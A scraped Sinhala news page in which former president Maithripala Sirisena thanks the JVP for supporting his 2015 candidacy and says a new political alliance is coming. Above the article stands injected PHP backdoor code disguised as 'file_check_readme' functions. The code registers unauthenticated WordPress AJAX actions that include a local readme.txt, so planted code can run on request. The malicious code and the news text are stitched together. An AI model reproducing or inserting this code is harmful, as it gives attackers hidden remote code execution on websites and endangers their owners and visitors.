if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } JVP මට ජනාධිපති වෙන්නත්, යහපාලන ආණ්ඩුවටත් බොහෝ උදවු කලා.. එයට ස්තුතියි..- මෛත‍්‍රි - mediahumanrights.lk
mediahumanrights.lk
News Political

JVP මට ජනාධිපති වෙන්නත්, යහපාලන ආණ්ඩුවටත් බොහෝ උදවු කලා.. එයට ස්තුතියි..- මෛත‍්‍රි

2015 ජනාධිපතිවරණයට පොදු අපේක්ෂක ලෙස තරග කළ තමන්ට ජනතා විමුක්ති පෙරමුණ සහාය දුන් බවත් ඒ සම්බන්ධයෙන් තමන් ඔවුනට ගෞරව කරන බවත් හිටපු ජනාධිපති මෛත්‍රීපාල සිරිසේන මහතා සඳහන් කරයි.

එම යහපාලන ආණ්ඩුවේ මැති ඇමතිධූර නොගත්තද බොහෝ කටයුතුවලදී ජනතා විමුක්ති පෙරමුණ ආණ්ඩුවට සහයෝගය ලබා දුන් බවද හෙතෙම පැවසීය.

ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ ආසන බල මණ්ඩල හමුවක් අමතමින් හෙතෙම මේ බව කියා සිටියේය.

ඉදිරි මැතිවරණයේදී ජයග්‍රහණය ලැබිය හැකි වැඩපිළිවෙලක් දැනටමත් සකස්කර අවසන් බවත් පැවසූ ඔහු තවත් දින කිහිපයකින් රටේ වැදගත් දේශපාලන පක්ෂ හා එක්ව නව දේශපාලන සන්ධානයක් බිහි කරන බවද තවදුරටත් එහිදී පැවසුවේය.

Related posts

ජනපති අනුර අත්සන් කල මුදල් නෝට්ටු එන දවස ගැන මහ බැංකු අධිපති කියයි..

Shiran Viraj

21 දිනලා ක්‍ෂණිකව දිවුරුම් දෙනවා.. ක්‍ෂණිකව පාර්ලිමේන්තුව විසුරුවනවා…

Shiran Viraj

ලංකාවෙ විදේශ ණය ඩොලර් බිලියන 41යි.. ඒක සොච්චම් ණයක්.. ගාන කියන්නත් ලැජ්ජයි.

Shiran Viraj